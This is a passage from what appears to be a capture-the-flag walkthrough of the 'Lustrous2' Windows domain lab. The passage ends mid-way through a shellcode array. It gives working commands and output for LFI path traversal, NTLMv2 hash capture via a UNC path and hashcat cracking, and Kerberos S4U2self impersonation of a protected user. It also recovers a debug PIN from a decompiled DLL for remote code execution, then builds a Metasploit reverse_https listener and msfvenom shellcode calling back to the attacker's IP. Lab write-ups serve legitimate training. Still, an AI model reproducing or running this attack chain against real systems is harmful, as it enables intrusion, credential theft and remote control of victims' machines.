7gJzgYiWhWPDNxzZ4MTUpXzUf0WbzpjAY0XtSi7cUfmJ6ODQHn4IVoENov7INMO6LLBfmmzThlwjj19Fr4tGS4IHzTwUj1+gYdTriAerwj05RFRyKk+PbSUM5Pln6AW3Z29tBpJ5SRK/X5IsrvSy0dfSkXydzjBOpygwV1pEcLnQvHJjGn/THaN2hiBPvcQ8CGPd6QXMbPxgAvUv0x+6aWOkcbJEK5TkvKnCPQHSASn4eb8BLzreYijbongxLpJAomBR2w02gSkujvD+bA4EXfWZbKB7a4LrG98pTzPMFtG56mL2lmnYWlfqKs6R2BfDnw7obcFGHjPXiZ0Ra1Ps7hncEzP18qaIFVgc1W42QWTBg5cJssAjHb92+6+mrMdp86BVA4C2JtxgddEHQ5kDGIAXnYrxqWdBMu5LyifWrPsV/bDajkyI32QhPh9r0+CQE2WIFWmWL42NgkmlWkp8mYGo8JdF+Mmrp4hpFUIWy/oiinrkH77REbX+a2sNjho7MgqyqTTd/BNrnBXEDXzJmtzYX1zYn0kkBpnrJLv5fHyuLVXy9LnolHaqtXIWWvniPVW/iskj+TxEPOkgdYwgdOgAwIBEqKBywSByI+XNoElSZ87TQvpdkyuK/HjIf2gAu8xp5y9TLhMwLM54IfpWu+UTv2X0bVzWpoFyqRSHRD0hldpazFvu4AJvgkDv2hZxgwwWoAPdE4xZLFIZjAGRdqUwwlgq9RG20N3VKxoJSvsCteZhT39S24hqCQGdmhs+z2BOZmDcd1cm2oc4un+l0XJjetPT0DEpZQ6MNP35dSvW6BLRVLNKdmOyRIl1zfDQABgu0GqURk6bFYSFxCpOT8MJX4/72UbvpA7iUVq55f2ludI
> User-Agent: curl/8.11.1
> Accept: */*
> 
* Request completely sent off
< HTTP/1.1 200 OK
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=utf-8
< Server: Microsoft-IIS/10.0
< WWW-Authenticate: Negotiate oYG3MIG0oAMKAQChCwYJKoZIhvcSAQICooGfBIGcYIGZBgkqhkiG9xIBAgICAG+BiTCBhqADAgEFoQMCAQ+iejB4oAMCARKicQRvNhIKcix1FwXdB7T2Hc+OZgyxUu4x2u5xGirLgSd1RqPypmdH+8UY4Em56DjFBfwZD+ipkPlnJZAF06idc464A6cmYK/rN1/Jee7TZYkT8UUp1UT6sb9YLJrq6gETHICNCRbooqqG5Mu1W4TdrBH1
* Negotiate: noauthpersist -> 0, header part: true
< Persistent-Auth: true
< X-Powered-By: ASP.NET
< Date: Thu, 30 Jan 2025 08:21:34 GMT
< 
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title> - LuShare</title>
    <link rel="stylesheet" href="/lib/bootstrap/dist/css/bootstrap.min.css" />
    <link rel="stylesheet" href="/css/site.css?v=pAGv4ietcJNk_EwsQZ5BN9-K4MuNYS2a9wl4Jw-q9D0" />
    <link rel="stylesheet" href="/LuShare.styles.css?v=hKE8kIfrqKHdCpCgDPhNfbPhKrnJYC275iQvRV7rimM" />
</head>
<body>
    <header b-d5yzov7vxd>
        <nav b-d5yzov7vxd class="navbar navbar-expand-sm navbar-toggleable-sm navbar-light bg-white border-bottom box-shadow mb-3">
            <div b-d5yzov7vxd class="container-fluid">
                <a class="navbar-brand" href="/">LuShare</a>
                <button b-d5yzov7vxd class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target=".navbar-collapse" aria-controls="navbarSupportedContent"
                        aria-expanded="false" aria-label="Toggle navigation">
                    <span b-d5yzov7vxd class="navbar-toggler-icon"></span>
                </button>
                <div b-d5yzov7vxd class="navbar-collapse collapse d-sm-inline-flex justify-content-between">
                    <ul b-d5yzov7vxd class="navbar-nav flex-grow-1">
                        <li b-d5yzov7vxd class="nav-item">
                            <a class="nav-link text-dark" href="/">List</a>
                        </li>
                    </ul>
                    <p b-d5yzov7vxd class="nav navbar-text">Well met, LUSTROUS2\Thomas.Myers!</p>                   
                </div>
            </div>
        </nav>
    </header>
    <div b-d5yzov7vxd class="container">
        <main b-d5yzov7vxd role="main" class="pb-3">
            
<h2>Available Files</h2>

<table class="table">
    <thead>
        <tr>
            <th>File Name</th>
            <th>Action</th>
        </tr>
    </thead>
    <tbody>
            <tr>
                <td>audit.txt</td>
                <td>
                    <a href="/File/Download?fileName=audit.txt" class="btn btn-primary">Download</a>
                </td>
            </tr>
    </tbody>
</table>
        </main>
    </div>

    <footer b-d5yzov7vxd class="border-top footer text-muted">
        <div b-d5yzov7vxd class="container">
            &copy; 2024 - LuShare</a>
        </div>
    </footer>
    <script src="/lib/jquery/dist/jquery.min.js"></script>
    <script src="/lib/bootstrap/dist/js/bootstrap.bundle.min.js"></script>
    <script src="/js/site.js?v=hRQyftXiu1lLX2P9Ly9xa4gHJgLeR1uGN5qegUobtGo"></script>
    
</body>
</html>
* Connection #0 to host lus2dc.lustrous2.vl left intact

Found /File/Download?fileName=audit.txt

We can download the file directly via Firefox or via cURL:

$ curl --negotiate -u : -O http://lus2dc.lustrous2.vl/File/Download?fileName=audit.txt
$ cat audit_draft.txt                                                                 
Audit Report Issue Tracking

[Fixed] NTLM Authentication Allowed
[Fixed] Signing & Channel Binding Not Enabled
[Fixed] Kerberoastable Accounts
[Fixed] SeImpersonate Enabled

[Open] Weak User Passwords 

Same file we saw previously during our FTP enumeration

LFI

Let’s check for local file inclusion (LFI):

Try with /File/Download?fileName=C:/Windows/System32/drivers/etc/hosts (via cURL):

$ curl --negotiate -u : http://lus2dc.lustrous2.vl/File/Download?fileName=C:/Windows/System32/drivers/etc/hosts   
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost

Try with /File/Download?fileName=..\..\..\..\windows\win.ini (via Firefox):

image

LFI confirmed

NTHash Stealing (ShareSvc)

Since this is a windows machine, we can try to provide a UNC Path and see if the requests hits our own machine.

Start an impacket smb server:

$ impacket-smbserver share share -smb2support 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

Or start a Responder:

$ sudo Responder -I tun0

Request the UNC path:

$ curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?fileName=\\10.8.4.253\share\notexist.txt' -v

Then capture the hash:

[*] Incoming connection (10.10.99.159,50789)
[*] AUTHENTICATE_MESSAGE (LUSTROUS2\ShareSvc,LUS2DC)
[*] User LUS2DC\ShareSvc authenticated successfully
[*] ShareSvc::LUSTROUS2:aaaaaaaaaaaaaaaa:ce5171ee2aa9db87fbf49222690dce71:010100000000000000ef1140f672db0193b384875cabaef9000000000100100046004c004400760063006400750046000300100046004c004400760063006400750046000200100044005700660048006900620051006f000400100044005700660048006900620051006f000700080000ef1140f672db0106000400020000000800300030000000000000000000000000210000b483f02e1ff1de27c5799a554118b7e8f66ce7544368161f8a32f1b583177a1e0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0034002e003200350033000000000000000000
[*] Closing down connection (10.10.99.159,50789)

Try to crack it with Hashcat:

$ hashcat -a 0 -m 5600 ShareSvc.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
...
SHARESVC::LUSTROUS2:aaaaaaaaaaaaaaaa:ce5171ee2aa9db87fbf49222690dce71:010100000000000000ef1140f672db0193b384875cabaef9000000000100100046004c004400760063006400750046000300100046004c004400760063006400750046000200100044005700660048006900620051006f000400100044005700660048006900620051006f000700080000ef1140f672db0106000400020000000800300030000000000000000000000000210000b483f02e1ff1de27c5799a554118b7e8f66ce7544368161f8a32f1b583177a1e0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0034002e003200350033000000000000000000:#1Service
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SHARESVC::LUSTROUS2:aaaaaaaaaaaaaaaa:ce5171ee2aa9db...000000
...

Found ShareSvc:#1Service

S4U2SELF abuse for impersonating (Sharon.Birch)

We saw before that Ryan Davies and Sharon Birch are in ShareAdmins group.

So let’s target Shaon (gallantry obliges, ladies first) and attempt to impersonate her against the web application as we have service account ShareSvc’s password.

Before that we check if ShareAdmins group is in Protected Users group or not:

$ cat _groups.json | jq | grep -I -C10 'Protected Users'
    ],
    "distinguishedName": "CN=ShareAdmins,OU=lustrous,DC=Lustrous2,DC=vl",
    "dn": "CN=ShareAdmins,OU=lustrous,DC=Lustrous2,DC=vl",
    "groupType": -2147483646,
    "instanceType": 4,
    "member": [
      "CN=Sharon Birch,OU=lustrous,DC=Lustrous2,DC=vl",
      "CN=Ryan Davies,OU=lustrous,DC=Lustrous2,DC=vl"
    ],
    "memberOf": [
      "CN=Protected Users,CN=Users,DC=Lustrous2,DC=vl"
    ],
    "name": "ShareAdmins",
    "objectCategory": "CN=Group,CN=Schema,CN=Configuration,DC=Lustrous2,DC=vl",
    "objectClass": [
      "top",
      "group"
    ],
    "objectGUID": "{bb1a80e7-e1e3-4ee4-9fb1-47c1179f34a0}",
    "objectSid": "S-1-5-21-380911855-3882613531-2069040882-1174",
    "sAMAccountName": "ShareAdmins",
--

Confirmed it’s a member of the Protected Users Group, which means that those users can’t easily be impersonated when using techniques like Silver Tickets or Delegation.

One technique that allows to bypass this restriction is s4u2self.

Using the s4u2self kerberos extension, allows the service user to request a service ticket to itself on behalf of an abitrary principal.

In order to perform the attack, we get a TGT for the service user and then impersonate Sharon Birch:

$ impacket-getTGT lustrous2.vl/ShareSvc:'#1Service' -dc-ip lus2dc.lustrous2.vl                                              
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in ShareSvc.ccache
$ export KRB5CCNAME=ShareSvc.ccache 
$ klist
Ticket cache: FILE:ShareSvc.ccache
Default principal: ShareSvc@LUSTROUS2.VL

Valid starting       Expires              Service principal
01/30/2025 19:56:21  01/31/2025 05:56:21  krbtgt/LUSTROUS2.VL@LUSTROUS2.VL
	renew until 01/31/2025 19:56:22
$ impacket-getST -self -impersonate "Sharon.Birch" -k -no-pass lustrous2.vl/ShareSvc -altservice HTTP/lus2dc.lustrous2.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Impersonating Sharon.Birch
[*] Requesting S4U2self
[*] Changing service from ShareSvc@LUSTROUS2.VL to HTTP/lus2dc.lustrous2.vl@LUSTROUS2.VL
[*] Saving ticket in Sharon.Birch@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccache
$ export KRB5CCNAME=Sharon.Birch@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccache 
$ klist
Ticket cache: FILE:Sharon.Birch@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccache
Default principal: Sharon.Birch@lustrous2.vl

Valid starting       Expires              Service principal
01/30/2025 20:04:18  01/31/2025 05:56:21  HTTP/lus2dc.lustrous2.vl@LUSTROUS2.VL
	renew until 01/31/2025 19:56:22

Using Firefox, we can see that we are logged as Sharon.Birch, as an application admin and have a new upload option.

image

Quick check also via cURL:

$ curl --negotiate -u : http://lus2dc.lustrous2.vl -v
* Host lus2dc.lustrous2.vl:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.99.159
*   Trying 10.10.99.159:80...
* Connected to lus2dc.lustrous2.vl (10.10.99.159) port 80
* using HTTP/1.x
* Server auth using Negotiate with user ''
> GET / HTTP/1.1
> Host: lus2dc.lustrous2.vl
> Authorization: Negotiate YIIGbAYGKwYBBQUCoIIGYDCCBlygDTALBgkqhkiG9xIBAgKiggZJBIIGRWCCBkEGCSqGSIb3EgECAgEAboIGMDCCBiygAwIBBaEDAgEOogcDBQAgAAAAo4IFPGGCBTgwggU0oAMCAQWhDhsMTFVTVFJPVVMyLlZMoiYwJKADAgEAoR0wGxsESFRUUBsTbHVzMmRjLmx1c3Ryb3VzMi52bKOCBPMwggTvoAMCARKhAwIBA6KCBOEEggTdUrx0nrDJNQ9MR7AhFcW+mRgpBanMgl1UZfESelPCAx6PXxidjDghrub20ENU7OATOcLYsAt5nV1P3SG/xDXqIulBglvSvpER0ewA/8h/fn7tISUsy9kgMHq58r4m13QMahfZ8sneI7JnGBzDhFeyhDiqUJxif9W/5ZVH2yxlJFjjZWmQ2IOADfhpTS3IgMphCEvJeFDxuYeAxw7ZGD4kXMRUOgUvgVbD+rJfMtLCDE+TsnnC0Lrtn/L/63u2VmakzRU/pXPWA9eYH1zV/TXM1Y8pXmm0mIlYe4sczKzQTFeXjSLs4z3kABWad8DKHlFL/3FRscucFEiEoltkWp54BoQ52L8KJOfZjMCyuojowM2dg+gugELD3V1XV60cRU/IL9RSwQ1tAhV7bmD1nU2MxX/1CUesKxaEe5M8doMFY3c0dFHXO6bj3/nnVw9s5UA9j4BUVGLbyglEN5ukQfZ7mc0lkaY/IMIdYOr2oQfAn5KSRApkJhqqRLCkDzbQKKWg5xuBNaG8UEPgzMcIh847FQzgzruf210uOl6fB2J+3Y4c4QsgkRKW244qqbJyNDXiXKtsyoddR8vP7jtzPaj4omcYsJAMhJfzAL9Fn1pUpyWfqzGIxnNfhlkvPqQFmM7PH8KmhbvNFDmX7w7Z/RIbZ3XeXW7ciNpRsOcbW5RQmeBCIx5SYBDw3MV0D/VJJd+AMyefEYmPnyKtljcuUtyWt3KUaQiLlmuai/d+KdICYqc5O3oo6usqH/3lVytftdPgfYtArweKij4B0V7ZXYvKOjWOTbKA8a22vMbEBZyfmBF1MViHP9th/lo7G6dogKXWp/EZPjB2LH65+a3/LdNG14d6fifu9k0/7op8E6HwnP/6mgqGKXxb1c56IPa9tSA6EYAKBazhRvUqD9mO7Orwpmll9wfPWOIBfrn3NSaROx3wfi01GX38QRfy0vUTXEK8p/UfTZJj9vfED61tyMPoiMdTqtJ3O8Y3qbTrcSIejgg/wsRjsMo0kmWKVRbmEXGL1ZqkvWAK3TKdnD1CSuisWH1JFji2IoRUPylGNb0lAOE9Nmhni7HxSDK6hDbZOhlnw/o/9SnkKbkHnuLeHuo5btcfM29NwNhL4/fRK7kjYnq9a+6/8igTo2dpZhPUVcQvvM1XndmOmojJyj1AICjfYoKamjDoGdo4oH60KnOBIvJITVO3/+fCwuIR7+rCDBV8X/zhtDLn7jcM2kB6J3xaLhRwERqSP9GZYTWpQErLO4wIqP++/c4WwORIxYVLGF5jg+keyFZKfmPQowD9/w6bDJddqmoutXUzGAjpQJmU4oOX3nvd8/RpP2jgTcMcfkdWX0XoYlk/3dYUyBt8qMKHsrE+s23nU9txay7sBDf2LJ4I2Qd9XvNHaG7wehfByfcZm4vOgTpl64nXms8GEwcWFy1QdI8s95g3lE47eIDO6T+NVVtvIUl3jrh1qfLZz3+pCyihK+lFUv7SZxBh9vkQZ5q+tY6gMgoUQSI474olHQv8VYcBUDBs5G9q6saQ9Xdm9qJBra1VZy87T5RvLxfJuDvCmXbRbRZ+1SjZTcTi40hIIPTZfQeLR+Z0lubqsunTuSjdlLtPOMIDzbRRoUN+vRvaDcqxmGM2WSr4SNm+swGPMkMu68GlngpEofLzpIHWMIHToAMCARKigcsEgcgUX5MQICqXdgDLMdY+Md1AcrTjkLLgbXe28qIjNyT0hM9fLBjOQftUGLhNKE/eQJm3pocsjpmx2/k/oNiXyKLZvAGdKMU/z9HPpiWGjhs706xCTHvOMcMG+HONfcw5G74Ngl1sd40zu+syqqnCsIh6aKv+j3PLWHPKAwOrFBvPyPtj881KU+OYgY3qizyNxkpBTRzA5mnC8BZ3+boGMhM/FBUHr7NjO2cgLNEaFSSxJwOZop2r+p2aJbM/jNzkQSJ5top7mcA50w==
> User-Agent: curl/8.11.1
> Accept: */*
> 
* Request completely sent off
< HTTP/1.1 200 OK
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=utf-8
< Server: Microsoft-IIS/10.0
< WWW-Authenticate: Negotiate oYG3MIG0oAMKAQChCwYJKoZIhvcSAQICooGfBIGcYIGZBgkqhkiG9xIBAgICAG+BiTCBhqADAgEFoQMCAQ+iejB4oAMCARKicQRvMp/YAsAW0M0EHWMlWVeKzS1/SBm1PCwCdJZ5s41ZK+6W1lugdMQkl7VFxYt2ZXeNBeufh6AF+HSDKIp1aga+3CeRQUhW13nFZl1xhf11RQqt1R3YwkUCFfm79pyj3WB2lsI3J6p5dKnBSm2yb0lV
* Negotiate: noauthpersist -> 0, header part: true
< Persistent-Auth: true
< X-Powered-By: ASP.NET
< Date: Thu, 30 Jan 2025 11:05:25 GMT
< 
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title> - LuShare</title>
    <link rel="stylesheet" href="/lib/bootstrap/dist/css/bootstrap.min.css" />
    <link rel="stylesheet" href="/css/site.css?v=pAGv4ietcJNk_EwsQZ5BN9-K4MuNYS2a9wl4Jw-q9D0" />
    <link rel="stylesheet" href="/LuShare.styles.css?v=hKE8kIfrqKHdCpCgDPhNfbPhKrnJYC275iQvRV7rimM" />
</head>
<body>
    <header b-d5yzov7vxd>
        <nav b-d5yzov7vxd class="navbar navbar-expand-sm navbar-toggleable-sm navbar-light bg-white border-bottom box-shadow mb-3">
            <div b-d5yzov7vxd class="container-fluid">
                <a class="navbar-brand" href="/">LuShare</a>
                <button b-d5yzov7vxd class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target=".navbar-collapse" aria-controls="navbarSupportedContent"
                        aria-expanded="false" aria-label="Toggle navigation">
                    <span b-d5yzov7vxd class="navbar-toggler-icon"></span>
                </button>
                <div b-d5yzov7vxd class="navbar-collapse collapse d-sm-inline-flex justify-content-between">
                    <ul b-d5yzov7vxd class="navbar-nav flex-grow-1">
                        <li b-d5yzov7vxd class="nav-item">
                            <a class="nav-link text-dark" href="/">List</a>
                        </li>
                            <li b-d5yzov7vxd class="nav-item">
                                <a b-d5yzov7vxd class="nav-link" href="/File/Upload">Upload</a>
                            </li>
                            <!--
                            <li class="nav-item">
                                <a class="nav-link" href="/File/Debug">Debug</a>
                            </li>
                            -->
                    </ul>
                    <p b-d5yzov7vxd class="nav navbar-text">Well met, LUSTROUS2\Sharon.Birch!</p>                   
                </div>
            </div>
        </nav>
    </header>
    <div b-d5yzov7vxd class="container">
        <main b-d5yzov7vxd role="main" class="pb-3">
            
<h2>Available Files</h2>

<table class="table">
    <thead>
        <tr>
            <th>File Name</th>
            <th>Action</th>
        </tr>
    </thead>
    <tbody>
            <tr>
                <td>audit.txt</td>
                <td>
                    <a href="/File/Download?fileName=audit.txt" class="btn btn-primary">Download</a>
                </td>
            </tr>
    </tbody>
</table>
        </main>
    </div>

    <footer b-d5yzov7vxd class="border-top footer text-muted">
        <div b-d5yzov7vxd class="container">
            &copy; 2024 - LuShare</a>
        </div>
    </footer>
    <script src="/lib/jquery/dist/jquery.min.js"></script>
    <script src="/lib/bootstrap/dist/js/bootstrap.bundle.min.js"></script>
    <script src="/js/site.js?v=hRQyftXiu1lLX2P9Ly9xa4gHJgLeR1uGN5qegUobtGo"></script>
    
</body>
</html>
* Connection #0 to host lus2dc.lustrous2.vl left intact

Found a hidden endpoint <a class="nav-link" href="/File/Debug">Debug</a>

Confirmed we can access via Firefox:

image

RCE via debug functionality

Try to put basic command like whoami and we always receive:

image

A PIN code is required to run any command

As it’s a web app, then often sensitive information like credentials, codes … are stored in web.config.

We found a LFI previsouly then we use it to grab web.config:

$ curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?fileName=../../web.config' -o web.config
$ cat web.config                                                                                           
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="dotnet" arguments=".\LuShare.dll" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="inprocess" />
    </system.webServer>
  </location>
</configuration>
<!--ProjectGuid: 4E46018E-B73C-4E7B-8DA2-87855F22435A-->    
  • No pin code
  • Found that it’s a .NET core application running from LuShare.dll

Use again the LFI to grab LuShare.dll:

$ curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?fileName=../../LuShare.dll' -o LuShare.dll
$ file LuShare.dll                                                                                                                     
LuShare.dll: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections

LuShare.dll Reverse engineering

We use CodemerxDecompile to disassemble LuShare.dll as this software runs on Linux and not required to switch to Windows.

$ mkdir CodemerxDecompile && tar -xzpf ./CodemerxDecompile-linux-x64.tar.gz -C CodemerxDecompile
$ ./CodemerxDecompile/CodemerxDecompile

image

Here we can see the value of required the pin code ba45c518 and also that the commands are actually powershell commands in a custom runspace that is length restricted (less than 100 characters) and using constrained language mode.

Let’s confirm we can run commands by using cURL:

$ curl --path-as-is -i -s -k --negotiate -u : http://lus2dc.lustrous2.vl/File/Debug --data-binary $'pin=ba45c518&command=whoami' -X POST 
HTTP/1.1 200 OK
Content-Length: 20
Content-Type: text/plain
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate oYG3MIG0oAMKAQChCwYJKoZIhvcSAQICooGfBIGcYIGZBgkqhkiG9xIBAgICAG+BiTCBhqADAgEFoQMCAQ+iejB4oAMCARKicQRvhVYM3FxMa+0PzjLba27f/3lYL1rzNDYr37W2ERx3pjEudaYdZxJrGg2WJSM2TE04+RvH7viLsLrjg9nIyTj1i1I3TNT/a2DNF1VAYFqWA2Nv3S62gNy8GVmiuNGTq3beT943UdXM8WsMA0zKU7RL
Persistent-Auth: true
X-Powered-By: ASP.NET
Date: Thu, 30 Jan 2025 12:30:10 GMT

lustrous2\sharesvc

Confirmed that works so we have a RCE

Defender AV + AMSI Bypassing (Lustrous2_User)

with Powershell + MSF shellcode

Start a local web server:

$ python3 -m http.server 80 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Start a Meterpreter listener:

$ msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_https; set LHOST tun0; set LPORT 443; set ExitOnSession false; exploit -j"
Warning: KRB5CCNAME environment variable not supported - unsetting
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/meterpreter/reverse_https
LHOST => tun0
LPORT => 443
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) > 

Create a MSF shellcode:

$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.8.4.253 LPORT=443 -f ps1 -v SHELLCODE 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 808 bytes
Final size of ps1 file: 3966 bytes
[Byte[]] $SHELLCODE = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x51,0x56,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x4d,0x31,0xc9,0x48,0xf,0xb7,0x4a,0x4a,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x4d,0x31,0xc9,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9,0xd,0xac,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x41,0x58,0x48,0x1,0xd0,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0x74,0x0,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26,0x7,0xff,0xd5,0x53,0x53,0xe8,0x54,0x0,0x0,0x0,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x35,0x2e,0x30,0x20,0x28,0x4d,0x61,0x63,0x69,0x6e,0x74,0x6f,0x73,0x68,0x3b,0x20,0x49,0x6e,0x74,0x65,0x6c,0x20,0x4d,0x61,0x63,0x20,0x4f,0x53,0x20,0x58,0x20,0x31,0x34,0x2e,0x37,0x3b,0x20,0x72,0x76,0x3a,0x31,0x33,0x33,0x2e,0x30,0x29,0x20,0x47,0x65,0x63,0x6b,0x6f,0x2f,0x32,0x30,0x31,0x30,0x30,0x31,0x30,0x31,0x20,0x46,0x69,0x72,0x65,0x66,0x6f,0x78,0x2f,0x31,0x33,0x33,0x2e,0x30,0x0,0x59,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x53,0x53,0x49,0xba,0x3a,0x56,0x79,0xa7,0x0,0x0,0x0,0x0,0xff,0xd5,0xe8,0xb,0x0,0x0,0x0,0x31,0x30,0x2e,0x38,0x2e,0x34,0x2e,0x32,0x35,0x33,0x0,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0xbb,0x1,0x0,0x0,0x4d,0x31,0xc9,0x53,0x53,0x6a,0x3,0x53,0x49,0xba,0x57,0x89,0x9f,0xc6,0x0,0x0,0x0,0x0,0xff,0xd5,0xe8,0xab,0x0,0x0,0x0,0x2f,0x46,0x42,0x7a,0x41,0x34,0x63,0x38,0x32,0x56,0x37,0x59,0x32,0x52,0x7a,0x64,0x46,0x55,0x64,0x66,0x39,0x31,0x41,0x64,0x61,0x37,0x54,0x34,0x67,0x58,0x44,0x6d,0x45,0x6f,0x31,0x4a,0x6a,0x59,0x49,0x71,0x57,0x65,0x68,0x52,0x77,0x6b,0x78,0x6c,0x45,0x39,0x69,0x55,0x32,0x38,0x32,0x71,0x36,0x6f,0x42,0x6e,0x68,0x5f,0x63,0x78,0x56,0x33,0x4f,0x71,0x33,0x2d,0x76,0x63,0x48,0x59,0x76,0x73,0x6a,0x51,0x64,0x4d,0x6c,0x54,0x6d,0x41,0x6d,0x6a,0x68,0x70,0x34,0x4c,0x57,0x37,0x2d,0x35,0x73,0x58,0x2d,0x42,0x53,0x34,0x5a,0x4f,0x65,0x64,0x68,0x68,0x5f,0x49,0x46,0x79,0x56,0x32,0x35,0x49,0x56,0x32,0x48,0x53,0x72,0x59,0x42,0x35,0x33,0x63,0x4f,0x74,0x37,0x5f,0x54,0x46,0x4d,0x48,0x51,0x39,0x63,0x6c,0x6e,0x32,0x56,0x68,0x71,0x5a,0x37,0x67,0x72,0x63,0x73,0x7a,0x37,0x4f,0x48,0x48,0x6d,0x45,0x69,0x66,0x33,0x4b,0x69,0x57,0x65,0x7a,0x70,0x78,0x51,0x66,0x78,0x39,0x74,0x52,0x0,0x48,0x89,0xc1,0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8,0x0,0x32,0xa8,0x84,0x0,0x0,0x0,0x0,0x50,0x53,0x53,0x49,0xc7,0xc2,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x6a,0xa,0x5f,0x48,0x89,0xf1,0x6a,0x1f,0x5a,0x52,0x68,0x80,0x33,0x0,0x0,0x49,0x89,0xe0,0x6a,0x4,0x41,0x59,0x49,0xba,0x75,0x46,0x9e,0x86,0x0,0x0,0x0,0x0,0xff,0xd5,0x4d,0x31,0xc0,0x53,0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,0x4d,0x31,0xc9,0x53,0x53,0x49,0xc7,0xc2,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1f,0x48,0xc7,0xc1,0x88,0x13,0x0,0x0,0x49,0xba,0x44,0xf0,0x35,0xe0,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0xff,0xcf,0x74,0x2,0xeb,0xaa,0xe8,0x55,0x0,0x0,0x0,0x53,0x59,0x6a,0x40,0x5a,0x49,0x89,0xd1,0xc1,0xe2,0x10,0x49,0xc7,0xc0,0x0,0x10,0x0,0x0,0x49,0xba,0x58,0xa4,0x53,0xe5,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,